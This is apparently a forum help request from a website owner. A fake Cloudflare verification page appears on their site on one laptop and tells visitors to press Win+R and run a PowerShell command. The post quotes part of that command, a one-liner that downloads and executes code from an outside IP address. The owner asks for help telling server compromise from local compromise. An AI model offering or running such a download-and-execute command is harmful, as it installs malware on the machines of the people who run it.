I am seeing a fake Cloudflare verification page when I open my website on my laptop. It asks me to press Win + R and run command such as (powershell -c iex(irm 178.16.52.232 ...)). This happens on all browsers on this laptop, but the site opens normally on my phone.
I previously ran some commands during troubleshooting, but now I realise this page is not legitimate. Antivirus scans, browser resets, hosts file check, and network reset have not fixed it. The issue still persists only on this machine.
Also, on another laptop, the site loads but is unusually slow.
I earlier had a WordPress malware issue (Wordfence detected a malicious file), which I removed, and scans now show clean. My developer can access the site normally.
Trying to understand whether this is still a server issue or a local system compromise, and what the safest next step is. Please help.
